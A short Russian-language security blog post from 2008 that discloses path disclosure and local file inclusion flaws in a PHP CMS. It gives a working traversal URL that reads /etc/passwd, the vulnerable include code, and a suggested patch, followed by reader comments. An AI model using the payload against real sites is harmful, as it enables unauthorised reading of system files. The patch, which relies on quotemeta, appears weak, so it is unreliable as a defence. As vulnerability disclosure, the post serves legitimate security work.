Дата: 23.08.2008, Категория: Взлома и защита Более ранние/поздние версии не смотрел.
Раскрытие путей:
http://host/admin/modules/about.php
http://host/modules/counter/module.def.php
http://host/modules/usersonline/module.def.php
Локальный инклуд:
http://host/admin/modules/about.php?name=../../../../../../../../../etc/passwd%00
$name=$_GET['name'];
include("../../modules/$name/module.info.php");
А я думал, что такого уже нигде не встретишь...
Защититься можно так:
<?php
// закрываем доступ для обычного посетителя
if(!isset($_SESSION["login"])) {
header("Location: ../admin.php");
return;
}
// проверяем $_GET['name'] на вшивость
$name = quotemeta($_GET['name']);
if(file_exists("../../modules/$name/module.info.php")) {
include("../../modules/$name/module.info.php");
} else { die(); }
?> |
Raz0r 23.08.2008 в этой версии двига есть еще удаленный инклуд и обнаружен он был в 2006 году! =)
http://www.milw0rm.com/exploits/2175
c0nst 23.08.2008 O_O ого, не думал что я такой археолог...
p.s. чего тебя в асе не видно?
|
|
О блоге
- Освещение проблем безопасности web приложений и серверов. Поисковая оптимизация.
Ник: c0nst
icq: 331699888
Рубрики
RSS-лента
Друзья и партнеры
|
Магнитофон усилитель зонального оповещения SYS-2240М, другое оборудование Inter-M оптом в Москве
|
Счетчики
|
|